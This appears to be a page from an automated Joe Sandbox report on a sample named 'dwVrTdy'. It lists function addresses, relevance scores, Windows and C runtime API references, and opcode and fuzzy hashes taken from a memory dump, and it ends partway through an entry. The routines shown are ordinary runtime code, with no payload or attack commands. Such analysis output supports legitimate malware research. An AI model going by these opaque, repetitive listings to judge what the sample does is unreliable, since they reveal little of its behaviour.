Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
Instruction ID: 819d9430d42c1b7549fb118639cfab70dc2895a2465e730630d9152ef9ec2707
Opcode Fuzzy Hash: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
Instruction Fuzzy Hash: 83117F21B1D74282FAD4B731996707961529F48BB0F444734E87EEB7D6DFACA485A300

Function 00007FF643F35450 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F354BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35737

Part of subcall function 00007FF643F24C60: __std_exception_copy.LIBVCRUNTIME ref: 00007FF643F24CED

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35758

Strings

status, xrefs: 00007FF643F35761
directory_iterator::directory_iterator, xrefs: 00007FF643F3574B

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_fs_code_page
String ID: directory_iterator::directory_iterator$status
API String ID: 250480979-2525534277
Opcode ID: e924926e74b1e48795aa593d38f53b2165f424594b82fea1ebc7af6c74fc6ee7
Instruction ID: 2ccc0a36fd63fa55bfeda2ba3eaee01e83aca3614bebe8ec73d941e90d16b440
Opcode Fuzzy Hash: e924926e74b1e48795aa593d38f53b2165f424594b82fea1ebc7af6c74fc6ee7
Instruction Fuzzy Hash: F6A1AF72F18B8586EB80FF65C4412AC23A1FB98B98F148631DE1DA7BD5DF38E5819740

Function 00007FF643F691B0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F691DB
CreateThread.KERNEL32 ref: 00007FF643F6921C
GetLastError.KERNEL32 ref: 00007FF643F6922A
CloseHandle.KERNEL32 ref: 00007FF643F69240
FreeLibrary.KERNEL32 ref: 00007FF643F6924F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
Instruction ID: 72aad7c02879c82d49760fbfc4497d18ca72b61b242aa3be7a9bcef67913a4cb
Opcode Fuzzy Hash: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
Instruction Fuzzy Hash: 63213025A0D74286EED4BF65A41217AB250FF89BD0F040531DE4EE7B95DF3CE405A600

Function 00007FF643F78038 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF643F78023), ref: 00007FF643F78154
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF643F78023), ref: 00007FF643F781DF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
Instruction ID: 145a0a102f2039d5f19ea89c7c9d54b714442e365c1466ce6625d25e9bc78fdb
Opcode Fuzzy Hash: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
Instruction Fuzzy Hash: 2991C122A1CA5285F7E0FF6594422BD2BA0BB44B88F944139DE0EB7AD5DF38D446E700

Function 00007FF643F46930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F46B69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F46B7B

Strings

ios_base::badbit set, xrefs: 00007FF643F46930

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: ios_base::badbit set
API String ID: 73155330-3882152299
Opcode ID: ba6f30eea4c24a8097427f0aee587d163c1334a874c193fb46c97ed7f5b56304
Instruction ID: 867ed7093200e483ec09770355bc59e9bc053983a1e90b4957efb60472f832b5
Opcode Fuzzy Hash: ba6f30eea4c24a8097427f0aee587d163c1334a874c193fb46c97ed7f5b56304
Instruction Fuzzy Hash: B351D062B0DB8682EE64EB55E6012796361EBB4BE4F108731DAAD637D1DF3CE480D700

Function 00007FF643F3CD20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3CF0C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F3CF12

Strings

, xrefs: 00007FF643F3CDA3

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-3916222277
Opcode ID: 071b645e5fc494ad45501c269137c8023e5938909f92c0e767069464d5e7bad0
Instruction ID: 1d1c5af23ca8e0076e0e934aed26c02de3c6b20c72e31e9367ee2775d52a3ac0
Opcode Fuzzy Hash: 071b645e5fc494ad45501c269137c8023e5938909f92c0e767069464d5e7bad0
Instruction Fuzzy Hash: 4F518A32A09B4596EB55AF2AD09126C33A0FB48B90F544532DB5DA3BE4DF3CE0B1E301

Function 00007FF643F6D340 Relevance: 4.7, APIs: 3, Instructions: 247COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6D37F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
Instruction ID: 6c39cb93a34d646f3867f1a7af3d67d843743fe9abec76fafc6ef3af3ea6ea44
Opcode Fuzzy Hash: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
Instruction Fuzzy Hash: 8A91D362F0E71686FF94FA64D5126B862A0AF54788F402135ED0DE7AD5EF2DF8029340

Function 00007FF643F25060 Relevance: 4.7, APIs: 3, Instructions: 151COMMON

Download Yara Rule

APIs

__std_fs_directory_iterator_open.LIBCPMT ref: 00007FF643F25160
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F25258
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2525E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_directory_iterator_open
String ID:
API String ID: 56456669-0
Opcode ID: 136d13d4139ea395e463f4cf206c3ce14e68f804bc637157810ea065fad1aa4e
Instruction ID: 930f577939091c137ba72233f749786a7e8139c81360ce22296a1a7d5669ce12
Opcode Fuzzy Hash: 136d13d4139ea395e463f4cf206c3ce14e68f804bc637157810ea065fad1aa4e
Instruction Fuzzy Hash: 0B510561F1C7C682EEA0BB19D1423BD9250EF857A0F405232DA5CA76D5DE6DF480EB00

Function 00007FF643F22590 Relevance: 4.6, APIs: 3, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F226FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F22702
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF643F2272D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
String ID:
API String ID: 1346393832-0
Opcode ID: 7c188323887dc589c4d67584065956a161218b031c349481a82824ce6a6b058d
Instruction ID: 5c1583eab7d92ad6fab638f546d1799a8f215013f4c78330b5b0b096ca930cef
Opcode Fuzzy Hash: 7c188323887dc589c4d67584065956a161218b031c349481a82824ce6a6b058d
Instruction Fuzzy Hash: 2641D762A1CB8181EA50BB68E5423B95321EF997D4F109230EA9C53BDADF7DD0C19700

Function 00007FF643F63098 Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F62B80: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF643F62B94

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF643F630BC
__scrt_release_startup_lock.LIBCMT ref: 00007FF643F6312A
__scrt_get_show_window_mode.LIBCMT ref: 00007FF643F6317D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
Instruction ID: 24f6a4ccf0299e83f881ee9d59af99df723dbe2ccd50f1e2fbe363d3539d69d0
Opcode Fuzzy Hash: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
Instruction Fuzzy Hash: 6E310A21E0C24791FAD4BB6599633BD2291AF41384F44603AD95EFB2E3DF2DA447B341

Function 00007FF643F690E8 Relevance: 4.5, APIs: 3, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F770FC: GetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7710B
Part of subcall function 00007FF643F770FC: SetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F771AB

CloseHandle.KERNEL32(?,?,?,00007FF643F69295,?,?,?,?,00007FF643F690D9), ref: 00007FF643F69123
FreeLibraryAndExitThread.KERNEL32(?,?,?,00007FF643F69295,?,?,?,?,00007FF643F690D9), ref: 00007FF643F69139
ExitThread.KERNEL32 ref: 00007FF643F69142

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 269d5c32d7ddaf75b05b2a421418ecaeceb98ddcc9d5e2872db963f75b52c73d
Instruction ID: 541a7b6b3ac4cf90f58db389b862fdeb6618c88abd329026a86f6f3b31c0e4a6
Opcode Fuzzy Hash: 269d5c32d7ddaf75b05b2a421418ecaeceb98ddcc9d5e2872db963f75b52c73d
Instruction Fuzzy Hash: 34F03C21A0C68292EF947F20844A27D2265EF48B38F280735DA3C936E4DF2CD856D340

Function 00007FF643F68704 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF643F68700), ref: 00007FF643F68715
TerminateProcess.KERNEL32(?,?,?,00007FF643F68700), ref: 00007FF643F68720
ExitProcess.KERNEL32 ref: 00007FF643F6872F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
Instruction ID: 4d413ededb3f40f578cac9c00317003d2c8768e278d188440f4612e886f8a44b
Opcode Fuzzy Hash: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
Instruction Fuzzy Hash: 74D06C14B4C61282EB983F70689717812516F88782F40283CC91EA73E2CE3CA84AA201

Function 00007FF643F24660 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2476C

Strings

Unknown exception, xrefs: 00007FF643F246D9

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Unknown exception
API String ID: 3668304517-410509341
Opcode ID: f9d95cd1e88be130f568b3084bb3211d3d686bffa53d367df6312a82e2c57907
Instruction ID: 645b68ccf7d431dcfaec0c13b8377fde4f06ae760321ed5e0d5ed5aeaa47dd12
Opcode Fuzzy Hash: f9d95cd1e88be130f568b3084bb3211d3d686bffa53d367df6312a82e2c57907
Instruction Fuzzy Hash: 81318462A1CBC5C1DA50AF28E5412AD6361FB997A8F505321EAAC537E9EF7CD580D300

Function 00007FF643F47870 Relevance: 3.2, APIs: 2, Instructions: 202COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F47B5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F47B67

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 388b5addc4c8463f24de326e88e7effa5c81be76fa7155d51a4efd2038def7e5
Instruction ID: 78446e9c54abb1558b3778bccead6474536645c0f014f814901dd022c4644f4b
Opcode Fuzzy Hash: 388b5addc4c8463f24de326e88e7effa5c81be76fa7155d51a4efd2038def7e5
Instruction Fuzzy Hash: 9F712462B0CB8682EE90EB11A54637AA355EBA5BD0F044536EE9D57BC5EF3CE0849300

Function 00007FF643F6C2C0 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6C304
_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6C3FB

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
Instruction ID: df648ead82817bfe97d26d8bc30cfae133773696db6f4e2298c85a428f74d269
Opcode Fuzzy Hash: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
Instruction Fuzzy Hash: AA51EB61B0D28146F6A8FE26944267A6690BF84BA4F155730DEBDE77C5EF3CD402A600

Function 00007FF643F3DD80 Relevance: 3.1, APIs: 2, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
Instruction ID: abfb7a79f8580d5d1fca690bdb1b01a7e1da7e2b1ff0e3fec03d89006b87f7e0
Opcode Fuzzy Hash: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
Instruction Fuzzy Hash: 7641B032B0AA5585EB91AF2AD45137967A1FB44FD8F144432EE0DA7FD8DE3CD8869300

Function 00007FF643F692E4 Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6930B

Part of subcall function 00007FF643F69298: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F692AF

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F693BF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
Instruction ID: f4cd271988d470d2543861c99a306d96f8cfa7f1210e60c5b1426fbd3fca80b2
Opcode Fuzzy Hash: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
Instruction Fuzzy Hash: D0319132A1C64281EA90FB14E4531BA3365EBD5BC0F942231E65EE77D2EF3DE106A300

Function 00007FF643F7BFC0 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF643F7BFAC,?,?,?,?,00000000,00007FF643F7C0B5), ref: 00007FF643F7C00C
GetLastError.KERNEL32(?,?,?,?,?,00007FF643F7BFAC,?,?,?,?,00000000,00007FF643F7C0B5), ref: 00007FF643F7C016

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
Instruction ID: 87c49a46a31c1085666971756a336af8cac21882e6b5774975ae50bc7f31fe66
Opcode Fuzzy Hash: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
Instruction Fuzzy Hash: 6E11276271CB8281DAA0BB25A4050696361BB45FF4F540331EE7DA77E9DF3CD0459740

Function 00007FF643F81A00 Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF643F7388A,?,?,?,00007FF643F73C62,?,?,?,?,00007FF643F867E8,?,?,?), ref: 00007FF643F81A14
FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF643F7388A,?,?,?,00007FF643F73C62,?,?,?,?,00007FF643F867E8,?,?,?), ref: 00007FF643F81A7E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
Instruction ID: 5015c0cdfedd2936218c0b175f678435ed3c6584e7f455b69f9560f98a4e6d20
Opcode Fuzzy Hash: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
Instruction Fuzzy Hash: 7201C811F1C75281EAA8BF56A41206A6360EF54FE0F484330DFAE63BD9DF2CE4429340

Function 00007FF643F22A30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F5DF9C: GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF643F22A65), ref: 00007FF643F5DFC2
Part of subcall function 00007FF643F5DF9C: FormatMessageA.KERNEL32 ref: 00007FF643F5DFF5

LocalFree.KERNEL32 ref: 00007FF643F22AA2

Strings

